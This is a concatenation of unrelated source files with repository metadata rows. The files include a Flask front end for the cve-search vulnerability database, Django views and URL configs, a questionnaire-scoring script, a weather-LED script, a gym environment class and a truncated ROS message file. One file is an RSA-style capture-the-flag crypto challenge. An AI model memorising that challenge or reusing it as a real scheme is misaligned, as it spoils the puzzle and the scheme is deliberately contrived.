self.minimal = True
super().__init__()
routes = [{'r': '/', 'm': ['GET'], 'f': self.index},
{'r': '/', 'm': ['POST'], 'f': self.index_post},
{'r': '/r/<int:r>', 'm': ['GET'], 'f': self.index_filter_get},
{'r': '/r/<int:r>', 'm': ['POST'], 'f': self.index_filter_post},
{'r': '/cve/<cveid>', 'm': ['GET'], 'f': self.cve},
{'r': '/cwe', 'm': ['GET'], 'f': self.cwe},
{'r': '/cwe/<cweid>', 'm': ['GET'], 'f': self.relatedCWE},
{'r': '/capec/<capecid>', 'm': ['GET'], 'f': self.capec},
{'r': '/browse', 'm': ['GET'], 'f': self.browse},
{'r': '/browse/', 'm': ['GET'], 'f': self.browse},
{'r': '/browse/<vendor>', 'm': ['GET'], 'f': self.browse},
{'r': '/search/<vendor>/<path:product>', 'm': ['GET'], 'f': self.search},
{'r': '/search', 'm': ['POST'], 'f': self.freetext_search},
{'r': '/link/<key>/<value>', 'm': ['GET'], 'f': self.link}]
filters = [{'n': 'htmlEncode', 'f': self.htmlEncode},
{'n': 'htmlDecode', 'f': self.htmlDecode},
{'n': 'sortIntLikeStr', 'f': self.sortIntLikeStr}]
context_processors = [self.JSON2HTMLTable]
error_handlers = [{'e': 404, 'f': self.page_not_found}]
for route in routes: self.addRoute(route)
for _filter in filters: self.addFilter(_filter)
for context in context_processors: self.addContextProcessors(context)
for handler in error_handlers: self.app.register_error_handler(handler['e'], handler['f'])
#############
# Functions #
#############
def addFilter(self, _filter):
self.app.add_template_filter(_filter['f'], _filter['n'])
def addContextProcessors(self, context_processor):
self.app.context_processor(context_processor)
def getFilterSettingsFromPost(self, r):
filters = dict(request.form)
filters = {x: filters[x][0] for x in filters.keys()}
errors = False
# retrieving data
try:
cve = self.filter_logic(filters, r)
except Exception as e:
cve = db.getCVEs(limit=self.args['pageLength'], skip=r)
errors = True
return {'filters': filters, 'cve': cve, 'errors': errors}
return(filters,cve,errors)
##########
# ROUTES #
##########
# /
def index(self):
cve = self.filter_logic(self.defaultFilters, 0)
return render_template('index.html', cve=cve, r=0, **self.args)
# /
def index_post(self):
args = dict(self.getFilterSettingsFromPost(0), **self.args)
return render_template('index.html', r=0, **args)
# /r/<r>
def index_filter_get(self, r):
if not r or r < 0: r = 0
cve = self.filter_logic(self.defaultFilters, r)
return render_template('index.html', cve=cve, r=r, **self.args)
# /r/<r>
def index_filter_post(self, r):
if not r or r < 0: r = 0
args = dict(self.getFilterSettingsFromPost(r), **self.args)
return render_template('index.html', r=r, **args)
# /cve/<cveid>
def cve(self, cveid):
cve = self.api_cve(cveid)
if not cve:
return render_template('error.html',status={'except':'cve-not-found','info':{'cve':cveid}},minimal=self.minimal)
return render_template('cve.html', cve=cve, minimal=self.minimal)
# /cwe
def cwe(self):
cwes=[x for x in self.api_cwe() if x["weaknessabs"].lower()=="class"]
return render_template('cwe.html', cwes=cwes, capec=None, minimal=self.minimal)
# /cwe/<cweid>
def relatedCWE(self, cweid):
cwes={x["id"]: x["name"] for x in self.api_cwe()}
return render_template('cwe.html', cwes=cwes, cwe=cweid, capec=db.getCAPECFor(cweid), minimal=self.minimal)
# /capec/<capecid>
def capec(self, capecid):
cwes={x["id"]: x["name"] for x in self.api_cwe()}
return render_template('capec.html', cwes=cwes, capec=db.getCAPEC(capecid), minimal=self.minimal)
# /browse
# /browse/
# /browse/<vendor>
def browse(self, vendor=None):
try:
data = self.api_browse(vendor)
if 'product' in data and 'vendor' in data:
return render_template('browse.html', product=data["product"], vendor=data["vendor"], minimal=self.minimal)
else:
return render_template('error.html', minimal=self.minimal, status={'except':'browse_exception', 'info': 'No CPE'})
except APIError as e:
return render_template('error.html', minimal=self.minimal, status={'except':'browse_exception', 'info':e.message})
# /search/<vendor>/<product>
def search(self, vendor=None, product=None):
search = vendor + ":" + product
cve = db.cvesForCPE(search)
return render_template('search.html', vendor=vendor, product=product, cve=cve, minimal=self.minimal)
# /search
def freetext_search(self):
search = request.form.get('search')
result = db.getSearchResults(search)
cve=result['data']
errors=result['errors'] if 'errors' in result else []
return render_template('search.html', cve=cve, errors=errors, minimal=self.minimal)
# /link/<key>/<value>
def link(self, key=None,value=None):
key=self.htmlDecode(key)
value=self.htmlDecode(value)
regex = re.compile(re.escape(value), re.I)
cve=db.via4Linked(key, regex)
cvssList=[float(x['cvss']) for x in cve if x.get('cvss')]
if cvssList:
stats={'maxCVSS': max(cvssList), 'minCVSS': min(cvssList),'count':len(cve)}
else:
stats={'maxCVSS': 0, 'minCVSS': 0, 'count':len(cve)}
return render_template('linked.html', via4map=key.split(".")[0], field='.'.join(key.split(".")[1:]),
value=value, cve=cve, stats=stats, minimal=self.minimal)
###########
# Filters #
###########
def htmlEncode(self, string):
return urllib.parse.quote_plus(string).lower()
def htmlDecode(self, string):
return urllib.parse.unquote_plus(string)
def sortIntLikeStr(self, datalist):
return sorted(datalist, key=lambda k: int(k))
def JSON2HTMLTable(self):
# Doublequote, because we have to |safe the content for the tags
def doublequote(data):
return urllib.parse.quote_plus(urllib.parse.quote_plus(data))
def JSON2HTMLTableFilter(data, stack = None):
_return = ""
if type(stack) == str: stack = [stack]
if type(data) == list:
if len(data) == 1:
_return += JSON2HTMLTableFilter(data[0], stack)
else:
_return += '<ul class="via4">'
for item in data:
_return += ('<li>%s</li>'%JSON2HTMLTableFilter(item, stack))
_return += '</ul>'
elif type(data) == dict:
_return += '<table class="invisiTable">'
for key, val in sorted(data.items()):
_return += '<tr><td><b>%s</b></td><td>%s</td></tr>'%(key, JSON2HTMLTableFilter(val, stack+[key]))
_return += '</table>'
elif type(data) == str:
if stack:
_return += "<a href='/link/"+doublequote('.'.join(stack))+"/"+doublequote(data)+"'>" #link opening
_return += "<span class='glyphicon glyphicon-link' aria-hidden='true'></span> </a>"
_return += "<a target='_blank' href='%s'>%s</a>"%(data, data) if tk.isURL(data) else data
_return += ""
return _return
return dict(JSON2HTMLTable=JSON2HTMLTableFilter)
##################
# Error Messages #
##################
def page_not_found(self, e):
return render_template('404.html', minimal=self.minimal), 404
if __name__ == '__main__':
server = Minimal()
server.start()
| [
"mohan.kk@flipkart.com"
] | mohan.kk@flipkart.com |
32d8b228910b00555072d555646b4a470a56bb2b | 0ce37bdeab869e0b20dab275f0f7e1b3bf7dcb60 | /project/project/urls.py | bd5366ef2d10037ae18a26c664cd0fb65e54585f | [
"MIT"
] | permissive | amritharun/squirrel-tracker | c9fcd15a59f73b4d80d072c190b74f7bd3d2239e | e3d0223ede58b442c53a0fa931ed59d4443ed4a1 | refs/heads/main | 2022-12-30T19:40:56.716080 | 2020-10-22T19:58:40 | 2020-10-22T19:58:40 | 302,137,821 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('tracker.urls')),
]
| [
"aa4053@columbia.edu"
] | aa4053@columbia.edu |
499e15bc058b825877025eda2fa9a34fc9c1cc8f | b4314f089cbb4163a3dc063f0c708117e168f56d | /pytdjangoblog/urls.py | 8724a1344757d930c2178c83320f0ca504cb6d47 | [] | no_license | tinodau/LearnDjango | dd2551f8445a113f17347c7d13e855254fbad683 | ced3d29cd94bfe9a50d32c005d34fdf170d5a105 | refs/heads/master | 2020-06-14T03:33:01.159897 | 2016-12-04T01:12:11 | 2016-12-04T01:12:11 | 75,509,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,029 | py | """pytdjangoblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from myblog.views import hello, current_time
from books import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^hello/$', hello),
url(r'^time/$', current_time),
url(r'^search-form/$', views.search_form),
url(r'^search/$', views.search),
url(r'^contact/$', views.contact),
]
| [
"daulat.rachmanto@gmail.com"
] | daulat.rachmanto@gmail.com |
71d91862e4376636867c0d4e4cf9c0e031276eab | 192494cfac925b9134723185ce9e844b3b13abca | /texteditorlib/autotyping.py | 957de6010fb912e703b50d45e4598123b6a8ca73 | [] | no_license | mdsajjadansari/Text-Editor | 78145511bf7111c8f0e0074656eb466c88c750a6 | 342de71e494afe764d059926ddeaed1604dd8a70 | refs/heads/master | 2022-06-17T14:29:45.861129 | 2020-05-05T00:44:43 | 2020-05-05T00:44:43 | 259,432,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py |
if __name__=='__main__':
from Graphics import Tkinter
else:
from .Graphics import Tkinter
if __name__=='__main__':
from Graphics import Tkinter as tk, tkFileDialog, tkMessageBox
else:
from .Graphics import Tkinter as tk, tkFileDialog, tkMessageBox
import time
import threading
class AutoWrite:
def __init__(self, pad):
self.text = pad
path = tkFileDialog.askopenfilename()
if path:
self.s = open(path, 'r').read()
self.insert_words()
else:
self.s = None
def insert_words(self):
print("[+] Auto Typing Executed")
for i in self.s:
self.text.insert("end", str(i))
time.sleep(0.1)
self.text.master.update()
self.text.master.update_idletasks()
return
if __name__ == '__main__':
root = Tkinter.Tk()
t= Tkinter.Text(root)
t.pack()
k=AutoWrite(t)
s=threading.Thread(target=k.insert_words)
k.insert_words()
s.start()
root.mainloop()
| [
"iamsajjadansari@gmail.com"
] | iamsajjadansari@gmail.com |
48b2e11482852404b0d42df21d5e7252714aaf19 | 53bff3de85c6e04b448623a4f71b062b6a102974 | /PhysicalCuriosity/PhysicalCuriosityStudy.py | 7c0705c53a8edc453845c489f3ae6af609f8bd3b | [] | no_license | rinatrosenbergkima/pandas | 366f9e35f753f0dd5e3016d1e79d22028171e656 | 1ed61618105f776af072380da8b521f47f4236ae | refs/heads/master | 2021-09-27T20:28:16.485741 | 2018-11-11T16:32:12 | 2018-11-11T16:32:12 | 109,816,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,246 | py | #tutorial:
#https://github.com/QuantScientist/Deep-Learning-Boot-Camp/blob/master/day01/Intro_ml_models.ipynb
#https://github.com/QuantScientist/Deep-Learning-Boot-Camp/blob/master/day01/predicting_income_from_census_income_data.ipynb
# > this is how to install pandas
# > sudo easy_install pip
# > pip install wheel
# > pip install pandas
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
df_AQ = pd.read_csv('data/AQ.csv', sep=',')
df_BFI = pd.read_csv('data/BFI.csv', sep=',')
df_demographics = pd.read_csv('data/demographics.csv', sep=',')
df_tablet = pd.read_csv('data/tablet.csv', sep=',')
df_summary = pd.DataFrame ()
def process_BFI():
# Reverse BFI:
df_BFI["BFI_6r"] = 6 - df_BFI["BFI_6"]
df_BFI["BFI_21r"] = 6 - df_BFI["BFI_21"]
df_BFI["BFI_9r"] = 6 - df_BFI["BFI_9"]
df_BFI["BFI_24r"] = 6 - df_BFI["BFI_4"]
df_BFI["BFI_34r"] = 6 - df_BFI["BFI_34"]
df_BFI["BFI_2r"] = 6 - df_BFI["BFI_2"]
df_BFI["BFI_12r"] = 6 - df_BFI["BFI_12"]
df_BFI["BFI_27r"] = 6 - df_BFI["BFI_27"]
df_BFI["BFI_37r"] = 6 - df_BFI["BFI_37"]
df_BFI["BFI_8r"] = 6 - df_BFI["BFI_8"]
df_BFI["BFI_18r"] = 6 - df_BFI["BFI_18"]
df_BFI["BFI_23r"] = 6 - df_BFI["BFI_23"]
df_BFI["BFI_43r"] = 6 - df_BFI["BFI_43"]
df_BFI["BFI_35r"] = 6 - df_BFI["BFI_35"]
df_BFI["BFI_41r"] = 6 - df_BFI["BFI_41"]
# calculate the big 5 factors:
df_BFI["BFI_extraversion"] = df_BFI[["BFI_1","BFI_6r","BFI_11","BFI_16","BFI_21r","BFI_26","BFI_31","BFI_36"]].mean(axis=1)
df_BFI["BFI_neuroticism"] = df_BFI[["BFI_4","BFI_9r","BFI_14","BFI_24r","BFI_29","BFI_34r","BFI_39"]].mean(axis=1)
df_BFI["BFI_agreeableness"] = df_BFI[["BFI_2r","BFI_7","BFI_12r","BFI_17","BFI_22","BFI_27r","BFI_32","BFI_37r","BFI_42"]].mean(axis=1)
df_BFI["BFI_concientiousness"] = df_BFI[["BFI_3","BFI_8r","BFI_13","BFI_18r","BFI_23r","BFI_28","BFI_33","BFI_38","BFI_43r"]].mean(axis=1)
df_BFI["BFI_openness"] = df_BFI[["BFI_5","BFI_10","BFI_15","BFI_20","BFI_25","BFI_30","BFI_35r","BFI_40","BFI_41r","BFI_44"]].mean(axis=1)
def process_AQ():
# reverse AQ (Autism Spectrum Quotient Questions)
## http://aspergerstest.net/interpreting-aq-test-results/
df_AQ["AQ_3"] = 6 - df_AQ["AQ_3"]
df_AQ["AQ_8"] = 6 - df_AQ["AQ_8"]
df_AQ["AQ_10"] = 6 - df_AQ["AQ_10"]
df_AQ["AQ_11"] = 6 - df_AQ["AQ_11"]
df_AQ["AQ_14"] = 6 - df_AQ["AQ_14"]
df_AQ["AQ_15"] = 6 - df_AQ["AQ_15"]
df_AQ["AQ_17"] = 6 - df_AQ["AQ_17"]
df_AQ["AQ_24"] = 6 - df_AQ["AQ_24"]
df_AQ["AQ_25"] = 6 - df_AQ["AQ_25"]
df_AQ["AQ_27"] = 6 - df_AQ["AQ_27"]
df_AQ["AQ_28"] = 6 - df_AQ["AQ_28"]
df_AQ["AQ_29"] = 6 - df_AQ["AQ_29"]
df_AQ["AQ_30"] = 6 - df_AQ["AQ_30"]
df_AQ["AQ_31"] = 6 - df_AQ["AQ_31"]
df_AQ["AQ_32"] = 6 - df_AQ["AQ_32"]
df_AQ["AQ_34"] = 6 - df_AQ["AQ_34"]
df_AQ["AQ_36"] = 6 - df_AQ["AQ_36"]
df_AQ["AQ_37"] = 6 - df_AQ["AQ_37"]
df_AQ["AQ_38"] = 6 - df_AQ["AQ_38"]
df_AQ["AQ_40"] = 6 - df_AQ["AQ_40"]
df_AQ["AQ_44"] = 6 - df_AQ["AQ_44"]
df_AQ["AQ_47"] = 6 - df_AQ["AQ_47"]
df_AQ["AQ_48"] = 6 - df_AQ["AQ_48"]
df_AQ["AQ_49"] = 6 - df_AQ["AQ_49"]
df_AQ["AQ_50"] = 6 - df_AQ["AQ_50"]
# Definitely agree or Slightly agree responses to questions 1, 2, 4, 5, 6, 7, 9, 12, 13, 16, 18, 19, 20, 21, 22, 23, 26, 33, 35, 39, 41, 42, 43, 45, 46 score 1 point.
# Definitely disagree or Slightly disagree responses to questions 3, 8, 10, 11, 14, 15, 17, 24, 25, 27, 28, 29, 30, 31, 32, 34, 36, 37, 38, 40, 44, 47, 48, 49, 50 score 1 point.
for column in df_AQ.iloc[:,1:51]:
df_AQ[column] = (df_AQ[column]>3)*1 # Give one point to questions who score less than 3
df_AQ["AQ_total"] = df_AQ.iloc[:,1:51].sum(axis=1)
def create_df_summary():
# create data frame with the important data
df_summary["id"] = df_AQ["id"]
df_summary["demographics_age"] = df_demographics["age"]
df_summary["demographics_gender"] = df_demographics["gender"]
df_summary["demographics_grades"] = df_demographics["grades"]
df_summary["demographics_psychometrics"] = df_demographics["psychometrics"]
df_summary["demographics_control_robot"] = df_demographics["control_robot"]
df_summary["demographics_q1"] = df_demographics["q1"]
df_summary["demographics_q2"] = df_demographics["q2"]
df_summary["demographics_q3"] = df_demographics["q3"]
df_summary["tablet_transition_entropy"] = df_tablet["transition_entropy"]
df_summary["tablet_multi_discipline_entropy"] = df_tablet["Multi_discipline_entropy"]
df_summary["tablet_multi_discipline_entropy"] = df_tablet["Multi_discipline_entropy"]
df_summary["tablet_psycholetrics"] = df_tablet["PSY"]
df_summary["tablet_normalized_total_listenning_time"] = df_tablet["normalized_total_listenning_time"]
df_summary["BFI_extraversion"] = df_BFI["BFI_extraversion"]
df_summary["BFI_neuroticism"] = df_BFI["BFI_neuroticism"]
df_summary["BFI_agreeableness"] = df_BFI["BFI_agreeableness"]
df_summary["BFI_concientiousness"] = df_BFI["BFI_concientiousness"]
df_summary["BFI_openness"] = df_BFI["BFI_openness"]
df_summary["AQ_total"] = df_AQ["AQ_total"]
#print(df_summary)
def correlation_matrix(df,title):
from matplotlib import pyplot as plt
from matplotlib import cm as cm
print("correlation_matrix")
fig = plt.figure()
ax1 = fig.add_subplot(111)
cmap = cm.get_cmap('jet', 10)
cax = ax1.imshow(df.corr(), interpolation="nearest", cmap=cmap)
ax1.grid(True)
plt.title(title)
labels=list(df) #the dataframe headers
print(labels)
ax1.set_xticklabels(labels,fontsize=4, rotation='vertical')
ax1.set_yticklabels(labels,fontsize=4)
# Add colorbar, make sure to specify tick locations to match desired ticklabels
fig.colorbar(cax, ticks=[0,.05,.10,.15,.20,.25,.30,.35,.40,.45,.50,.55,.60,.65,.70,.75,.8,.85,.90,.95,1])
plt.show()
def correlation_summary(df):
corr = df.corr()
print(corr)
plt.matshow(corr)
headers = list(df_summary)
x_pos = np.arange(len(headers))
plt.xticks(x_pos, headers, rotation='vertical', fontsize=4)
y_pos = np.arange(len(headers))
plt.yticks(y_pos, headers, fontsize=4)
plt.show()
def plot_correlations(x,y):
#plt.plot(df_summary["demographics_psychometrics"], df_summary["BFI_extraversion"], 'ro')
#plt.axis([400, 800, 0, 5])
#plt.show()
fig, ax = plt.subplots()
idx = np.isfinite(x) & np.isfinite(y)
fit = np.polyfit(x[idx], y[idx], deg=1)
ax.plot(x[idx], fit[0] * x[idx] + fit[1], color='red')
ax.scatter(x, y)
fig.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
process_BFI()
process_AQ()
create_df_summary()
#correlation_summary(df_summary)
#correlation_matrix(df_summary,"correlations")
plot_correlations(df_summary["demographics_psychometrics"],df_summary["BFI_extraversion"])
#plt.plot(df_summary["demographics_grades"],df_summary["BFI_extraversion"], 'ro')
#plt.plot(df_summary["BFI_concientiousness"],df_summary["tablet_normalized_total_listenning_time"], 'ro')
| [
"rinat.rosenberg.kima@gmail.com"
] | rinat.rosenberg.kima@gmail.com |
31ad4b8319049da0c46adfbd3bb7d1f84e6ca502 | 364cad049756c8ae0882c4bddac36d27c9b9d5c9 | /ipynb/process_KITTI_data.py | 656c1171aa4f92c91f735fd90a4bad880e7c1487 | [
"MIT"
] | permissive | GarethZhang/PointNetLK | c03ee81425248749bad670b98257b7dfa02a7c8f | c5208880e3ebfabb8f0477bd0a012c88fd316aa6 | refs/heads/master | 2020-09-08T09:24:19.371643 | 2019-11-14T07:02:53 | 2019-11-14T07:02:53 | 221,093,069 | 0 | 0 | MIT | 2019-11-12T00:07:27 | 2019-11-12T00:07:26 | null | UTF-8 | Python | false | false | 491 | py | import pykitti
import os
import numpy as np
from scipy.stats import binned_statistic
import pickle
import cv2
def make_dir_if_not_exist(path):
if not os.path.exists(path):
os.makedirs(path)
return path
def ensure_file_dir_exists(path):
make_dir_if_not_exist(os.path.dirname(path))
return path
base_dir = '/home/haowei/Documents/files/research/datasets/KITTI/dataset'
sequences = ["04"]
for seq in sequences:
data = pykitti.odometry(base_dir, seq, frames=None) | [
"gareth.zhang@mail.utoronto.ca"
] | gareth.zhang@mail.utoronto.ca |
beeb994bc275b0d7566e4102cb3cde213340d3ed | d7ae1e6da46ae8198aedff8c3a21db09c6829083 | /my1021_2_2.py | 54c29253165b444ada0bfbc5961cdaa67d83bc64 | [] | no_license | Aminoragit/Mr.noobiest | b503bbeac2777cd2fe6c5ba24d032f2204fe7bde | 5070e7c3215c8a6400879e52e55f47125bfca268 | refs/heads/master | 2022-03-26T18:22:31.989429 | 2019-12-27T00:31:08 | 2019-12-27T00:31:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | string_object = "python programming"
for ch in string_object :
print(ch)
| [
"noreply@github.com"
] | noreply@github.com |
ad703714edd63c2fc81280105c049bd81f3fb31a | 7d5af69c8ff72a003d171072e0f025400f309fc8 | /get_weather_pyowm.py | 38365653e54613d36283e50afb8d54fcdea697d8 | [] | no_license | elormcent/centlorm | a47f033e39fc9e093607e3705613fcd07bb8852d | ec7a60faa2dc2c196247ccd44d2fb6dbd7c2bdad | refs/heads/master | 2020-06-18T07:43:52.555439 | 2019-07-15T16:14:21 | 2019-07-15T16:14:21 | 196,219,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,479 | py | import pyowm
from gpiozero import LED
from time import sleep
def Weather_Forecast():
city = input("Enter Name of City with space :- ")
country = input("Enter Name of Country :- ")
led = LED(17)#yellow
led1 = LED(18)#red
led2 = LED(27)#green
apikey = '51c6723dd2f51626dd33896729e79676'
owm = pyowm.OWM(apikey)
observation = owm.weather_at_place('city, country')
w = observation.get_weather()
winds = w.get_wind()
humidities = w.get_humidity()
tempreture = w.get_temperature()
presh = w.get_pressure()
clud = w.get_clouds()
ran = w.get_rain()
snoww = w.get_snow()
print(" The weather information ")
if winds['speed'] < 15:
print( led2.on(),
sleep(5),
led2.off(),
sleep(1))
elif winds['speed'] > 15 or winds['speed'] < 21:
print( led.on(),
sleep(5),
led.off(),
sleep(1))
else:
print(led1.on()(),
sleep(5),
led1.off(),
sleep(1))
print("The wind result is :- ", winds['speed'])
#print("The humidity result is :- ", humidities)
#print("The tempreture is :- ", tempreture )
#print("The pressure is :- ", presh)
#print("The cloud coverage is :- ", clud)
# print("The cloud rain volume is :- ", ran)
#print("The cloud snow volume is :- ", snoww)
Weather_Forecast() | [
"innocent.fiadu@htu.edu.gh"
] | innocent.fiadu@htu.edu.gh |
dc19cf1d9e622a9dee15bf79c56443863a834648 | 860187a5081513d9b4a59260e4ba4e290c4f4638 | /quals/crypto/pqrsen/prob.py | 081cc3cbe2921af8625d14202f080d2196eb5057 | [
"MIT"
] | permissive | fraglantia/CTF-Arkavidia-6 | e0e89315bad16e4f2497aa93ffcc0543256166f6 | 97cc9f5d5fff158db83d9f7a411e7022c94b4b71 | refs/heads/master | 2022-04-01T13:40:26.602541 | 2020-02-14T06:10:01 | 2020-02-14T06:10:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | from Crypto.Util.number import *
from secret import *
m = bytes_to_long(flag)
p = getPrime(2048)
q = getPrime(2048)
r = inverse(pow(p,3),q)
s = (pow(p,2,p*q) - pow(q,0x10001,p*q)) % (p*q)
e = 0x10001
n = p*q
assert(m < n)
c = (pow(r*m,e,n)*inverse(s,n))% n
c = pow(c,2,n)
open("pub.key","w").writelines(map(lambda x: x + "\n", map(str, [r, s, e, n])))
open("flag.enc","w").write(str(c)) | [
"munirabdullahm@gmail.com"
] | munirabdullahm@gmail.com |
05fb3c8bc1ba86519606a3ecb9ac40cccfed17ac | 2964ced169dd32ecccd9ba37f8cf3b866ec2309b | /apps/sections/models.py | 5d58a7f86874a8ca1ff32779001ada03959a6659 | [] | no_license | GanZiB4Fun/GanZiB-Web | d876de959575967c5f95daa1f561f98ac81b8750 | cdf6f11a91548b167e764adf64e18381da0d1c1e | refs/heads/master | 2021-03-24T13:26:20.344641 | 2018-01-15T11:10:15 | 2018-01-15T11:10:15 | 116,032,699 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/1/2 16:52
# @Author : GanZiB
# @Email : ganzib4fun@163.com
# @Site :
# @File : models.py
# @Software: PyCharm
from flask_sqlalchemy import BaseQuery
from apps import db
class SectionsQuery(BaseQuery):
def getall(self):
return self.all()
def getcategory_id(self, id):
return self.get(id)
class Sections(db.Model):
__tablename__ = 'sections'
query_class = SectionsQuery
book_id = db.Column(db.Integer, db.Sequence('book_id'), autoincrement=True)
title = db.Column(db.String(255))
content = db.Column(db.String(255))
section_order = db.Column(db.Integer())
section_url = db.Column(db.String(255), primary_key=True)
book_name = db.Column(db.String(255))
path = db.Column(db.String(255))
def __init__(self, *args, **kwargs):
super(Sections, self).__init__(*args, **kwargs)
def __repr__(self):
return '<user name %r>' % self.name | [
"ganzib4fun@163.com"
] | ganzib4fun@163.com |
503b7f9f5bea3e416854a4403b9bb08dcf02eee1 | d07a4d928cf5c7e9826d4bd57a4aa70d1bbf9756 | /accounts/views.py | bbf666c3e281c25419c044a945392b7d6e77d7af | [
"MIT"
] | permissive | codexplore-io/django-blog | 8c197cdffd09e1966be715a30de3ff8818ad03d1 | 3305ce98a0baf2ceafdaa66d78088407d93a8258 | refs/heads/master | 2020-05-17T11:05:31.832642 | 2019-04-26T18:29:26 | 2019-04-26T18:29:26 | 183,675,976 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,508 | py | from django.shortcuts import render, redirect
from django.contrib.auth import get_user_model, authenticate, login, logout
from posts.models import Post
User = get_user_model()
# Create your views here.
def user_create_view(request):
if request.method == "POST":
context = {}
password1 = request.POST['password1']
password2 = request.POST['password2']
if password1 == password2:
username = request.POST['username']
email = request.POST['email']
try:
user1 = User.objects.get(username = username)
context['error'] = "Username or email is already in the system!"
return render(request, 'accounts/create.html', context = context)
except User.DoesNotExist:
try:
user2 = User.objects.get(email = email)
context['error'] = "Username or email is already in system!"
return render(request, 'accounts/create.html', context = context)
except User.DoesNotExist:
user = User.objects.create_user(username = username, email = email, password = password1)
return redirect('posts:list')
else:
context['error'] = "Passwords must match!"
return render(request, 'accounts/create.html', context = context)
else:
return render(request, 'accounts/create.html')
def user_login_view(request):
if request.method == "POST":
context = {}
username = request.POST['username']
password = request.POST['password']
user = authenticate(username = username, password = password)
if user is not None:
login(request, user)
context['success'] = "You are logged in!"
return render(request, 'accounts/login.html', context)
else:
context['error'] = "Invalid Login"
return render(request, 'accounts/login.html', context)
else:
return render(request, 'accounts/login.html')
def user_logout_view(request):
if request.user.is_authenticated:
logout(request)
return render(request, 'accounts/logout.html')
else:
return redirect('accounts:login')
def user_profile_view(request, username):
user = User.objects.get(username=username)
posts = Post.objects.filter(author = user)
context = {'posts':posts}
return render(request, 'accounts/profile.html', context = context)
| [
"tannersiciliano@gmail.com"
] | tannersiciliano@gmail.com |
373478a5506e864208ef712885d48dbfca547532 | fd8db5460e29f1e756954bea8b1f19d68f0c46c8 | /gym_subgoal_automata/envs/base/base_env.py | ec4115d0faa1c83b04f0b1e2469f72fa881f5d90 | [
"MIT"
] | permissive | ertsiger/gym-subgoal-automata | 35080daf98bb4ee83381ded02f802f9f48db2005 | 1879a6512441cdf0758c937cc659931d49260d38 | refs/heads/master | 2023-08-24T19:27:21.767022 | 2023-08-15T09:53:08 | 2023-08-15T09:53:08 | 225,397,189 | 7 | 4 | null | 2022-06-21T23:36:27 | 2019-12-02T14:43:02 | Python | UTF-8 | Python | false | false | 984 | py | from abc import ABC, abstractmethod
import gym
from gym_subgoal_automata.utils import utils
class BaseEnv(ABC, gym.Env):
RANDOM_SEED_FIELD = "environment_seed"
def __init__(self, params=None):
super().__init__()
self.params = params
self.is_game_over = False
self.seed = utils.get_param(self.params, BaseEnv.RANDOM_SEED_FIELD)
@abstractmethod
def step(self, action):
pass
@abstractmethod
def is_terminal(self):
pass
@abstractmethod
def get_observables(self):
pass
@abstractmethod
def get_restricted_observables(self):
pass
@abstractmethod
def get_observations(self):
pass
@abstractmethod
def get_automaton(self):
pass
@abstractmethod
def reset(self):
self.is_game_over = False
return None
@abstractmethod
def render(self, mode='human'):
pass
@abstractmethod
def play(self):
pass
| [
"danielfb93@gmail.com"
] | danielfb93@gmail.com |
b77bc2acca6b6e0e86c89938bda7c5ab19c1574c | 7aebfaec6957ad67523f1d8851856af88fb997a6 | /catkin_ws/devel/lib/python2.7/dist-packages/xarm_msgs/srv/_GetAnalogIO.py | 6f4bb532c9a98d105e10d7d82b9913662901a07b | [] | no_license | k-makihara/ROS | 918e79e521999085ab628b6bf27ec28a51a8ab87 | 45b60e0488a5ff1e3d8f1ca09bfd191dbf8c0508 | refs/heads/master | 2023-01-28T06:00:55.943392 | 2020-11-26T05:27:16 | 2020-11-26T05:27:16 | 316,127,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,564 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from xarm_msgs/GetAnalogIORequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class GetAnalogIORequest(genpy.Message):
_md5sum = "f1c58d245d5dbcbc33afe76f9fc1dff4"
_type = "xarm_msgs/GetAnalogIORequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
int16 port_num
"""
__slots__ = ['port_num']
_slot_types = ['int16']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
port_num
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
